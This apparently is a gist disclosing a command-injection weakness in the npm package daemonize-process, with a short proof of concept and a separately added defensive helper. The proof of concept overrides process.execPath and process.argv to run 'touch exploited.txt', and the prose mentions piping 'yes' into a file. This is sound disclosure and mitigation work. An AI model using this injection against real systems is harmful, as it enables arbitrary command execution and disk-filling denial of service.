Last active
October 29, 2023 12:22
Package daemonize-process: kills the current process and relaunches it, with the same semantics, as a background process. The process object attributes process.execPath and process.argv may be changed beforehand to launch an arbitrary script. This could be used, for example, to launch the command 'yes' piped into a file.
```javascript
'use strict';
const daemonizeProcess = require('daemonize-process');
process.execPath = 'touch';
process.argv = ['touch', 'exploited.txt', ''];
/*
 * This will launch a child process that is supposed to be the same binary as the current process.
 * By hijacking process.execPath and process.argv, we inject a different executable.
 * A local 'exploited.txt' file will be created.
 */
daemonizeProcess();
```
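A defensive counterpart, added here as an example and not taken from the gist or from the daemonize-process project: a relaunch helper that snapshots `process.execPath` and `process.argv` at module load and refuses to relaunch if the live values have drifted. The function names are hypothetical, and the unguarded helper only models the assumption, taken from the gist's comment, that the relaunch reads both globals at call time.

```javascript
'use strict';
const path = require('path');

// Snapshot taken at module load, before later code can reassign the
// mutable globals process.execPath and process.argv.
const TRUSTED = Object.freeze({
  execPath: process.execPath,
  argv: Object.freeze(process.argv.slice()),
});

// Hypothetical stand-in for a relaunch helper that trusts the live globals
// at call time (the behaviour the gist's comment describes).
function relaunchCommandFromGlobals(proc) {
  return { file: proc.execPath, args: proc.argv.slice(1) };
}

// Guarded variant: builds the command from the snapshot only, and fails
// closed if the live values no longer match it.
function relaunchCommandChecked(proc, trusted = TRUSTED) {
  if (!path.isAbsolute(trusted.execPath)) {
    throw new Error('trusted execPath is not an absolute path');
  }
  if (proc.execPath !== trusted.execPath) {
    throw new Error(`execPath changed since startup: ${proc.execPath}`);
  }
  const sameArgv = proc.argv.length === trusted.argv.length &&
    proc.argv.every((arg, i) => arg === trusted.argv[i]);
  if (!sameArgv) {
    throw new Error('argv changed since startup');
  }
  return { file: trusted.execPath, args: trusted.argv.slice(1) };
}

// Constructed sample: a process-like object altered the same way as in the gist.
const tampered = { execPath: 'touch', argv: ['touch', 'exploited.txt', ''] };
```

The command returned by the guarded helper is what a caller would hand to `child_process.spawn` with `detached: true`; the module must be loaded before any untrusted code runs for the snapshot to be meaningful.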